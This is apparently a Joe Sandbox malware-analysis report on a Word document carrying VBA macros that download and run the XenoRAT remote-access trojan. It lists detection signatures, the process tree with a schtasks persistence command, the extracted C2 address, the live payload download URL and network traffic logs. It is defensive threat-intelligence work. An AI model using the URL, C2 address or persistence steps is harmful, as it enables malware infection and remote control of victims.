Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yIla7SeJ6r.doc

Overview

General Information

Sample name:yIla7SeJ6r.doc
renamed because original name is a hash value
Original sample name:26973056c194b68b10d1c2b9a632a27e.doc
Analysis ID:1569823
MD5:26973056c194b68b10d1c2b9a632a27e
SHA1:0b61132df948c4d48e81b631bdad91be1080f530
SHA256:4a58b228b23cdc286d103115b2fb312eedf6741aeada17b242620b6737db1035
Tags:docRATXenoRATuser-abuse_ch
Infos:

Detection

XenoRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected XenoRAT
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with hexadecimal encoded strings
Document contains an embedded VBA with many randomly named variables
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process drops PE file
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3556 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • MDEODF.exe (PID: 3772 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" MD5: F44302503EA4EEDFA831C25711DF51B7)
      • MDEODF.exe (PID: 3812 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
        • MDEODF.exe (PID: 3884 cmdline: "C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe" MD5: F44302503EA4EEDFA831C25711DF51B7)
          • MDEODF.exe (PID: 3948 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
          • MDEODF.exe (PID: 3964 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
          • MDEODF.exe (PID: 3996 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
      • MDEODF.exe (PID: 3820 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
        • schtasks.exe (PID: 3956 cmdline: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • MDEODF.exe (PID: 3848 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
  • taskeng.exe (PID: 3084 cmdline: taskeng.exe {4070AE52-7E9D-44E5-8168-5CF4F89E1764} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • MDEODF.exe (PID: 3168 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
      • MDEODF.exe (PID: 3216 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
      • MDEODF.exe (PID: 3320 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
      • MDEODF.exe (PID: 976 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe MD5: F44302503EA4EEDFA831C25711DF51B7)
  • cleanup
{"C2 url": "87.120.120.27", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.380210454.00000000024F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
    00000008.00000002.380210454.0000000002500000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
      00000004.00000002.375878692.0000000002011000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
        00000005.00000002.375386923.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
          00000011.00000002.393953865.0000000002135000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XenoRATYara detected XenoRATJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            8.2.MDEODF.exe.2419b5c.1.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security
              5.2.MDEODF.exe.400000.0.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security
                4.2.MDEODF.exe.201a318.4.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security
                  8.2.MDEODF.exe.2419b5c.1.raw.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security
                    4.2.MDEODF.exe.201a318.4.raw.unpackJoeSecurity_XenoRATYara detected XenoRATJoe Security

                      System Summary

                      barindex
                      Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe
                      Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3556, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , ProcessId: 3772, ProcessName: MDEODF.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3556, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe" , ProcessId: 3772, ProcessName: MDEODF.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentProcessId: 3820, ParentProcessName: MDEODF.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, ProcessId: 3956, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 87.121.86.205, SourceIsIpv6: false, SourcePort: 443
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentProcessId: 3820, ParentProcessName: MDEODF.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, ProcessId: 3956, ProcessName: schtasks.exe
                      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3556, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe, ParentProcessId: 3820, ParentProcessName: MDEODF.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp6A67.tmp" /F, ProcessId: 3956, ProcessName: schtasks.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-06T10:30:33.399094+010020501101Malware Command and Control Activity Detected87.120.120.272222192.168.2.2249170TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: yIla7SeJ6r.docAvira: detected
                      Source: https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exeAvira URL Cloud: Label: malware
                      Source: C:\Users\user\Desktop\~WRD0000.tmpAvira: detection malicious, Label: HEUR/Macro.Downloader.PBJD.Gen
                      Source: 8.2.MDEODF.exe.2419b5c.1.raw.unpackMalware Configuration Extractor: XenoRAT {"C2 url": "87.120.120.27", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\~WRD0000.tmpJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJoe Sandbox ML: detected
                      Source: yIla7SeJ6r.docJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49161 version: TLS 1.2

                      Software Vulnerabilities

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exeJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: brtyhdrh[1].exe.0.drJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4x nop then jmp 002D17B0h5_2_002D0B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4x nop then jmp 003017B0h6_2_00300B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_00308872
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0030D719
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 4x nop then jmp 003017B0h9_2_00300B60
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 4x nop then jmp 001C17B0h11_2_001C0B60
                      Source: C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exeCode function: 4x nop then jmp 003617B0h12_2_00360B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4x nop then jmp 001C17B0h18_2_001C0B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4x nop then jmp 001C17B0h19_2_001C0B60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exeCode function: 4x nop then jmp 001C17B0h20_2_001C0B60
                      Source: global trafficDNS query: name: www.stipamana.com
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
